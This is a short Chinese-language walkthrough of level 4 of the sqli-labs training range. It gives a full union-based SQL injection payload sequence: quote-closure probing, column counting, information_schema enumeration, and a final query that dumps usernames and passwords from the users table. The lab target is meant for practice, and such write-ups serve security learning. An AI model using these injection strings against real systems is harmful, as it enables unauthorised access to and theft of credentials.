前面几关弄完了会重新补充
第四关
sqli-labs靶场
【注意:下文的正确指的是不报错】
联合注入
第4关
查看注入点:
依次测试:
?id=1 正确
?id=1 and 1=2–+ 正确
判断不说数字型注入,验证字符型注入,尝试单引号
?id=1’ and 1=2–+ 正确
?id=1’)and 1=2–+ 正确
试一试双引号
?id=1“ and 1=2–+ 按照提示修改
?id=1”) and 1=2–+ 报错
猜字段:二分法猜测,不做解释
?id=1″)order by 3–+ //三字段
测显位
?id=-1″)union select 1,2,3–+ //位于2,3字段
猜版本,数据库名
?id=-1″)union select 1,database(),version()–+
寻找当前数据库表
?id=-1″) union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()–+ //在这块儿你会得到几个一些表,比如【Your Password:emails,referers,uagents,users】 可以查一下这些相关的资料
在其后查询该数据库中users表中所有列名:
?id=-1″) union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’–+
//会得到比如:【 Your Login name:security
Your Password:id,username,password 】
最后执行我们需要的
?id=-1″) union select 1,group_concat(username),group_concat(password) from users–+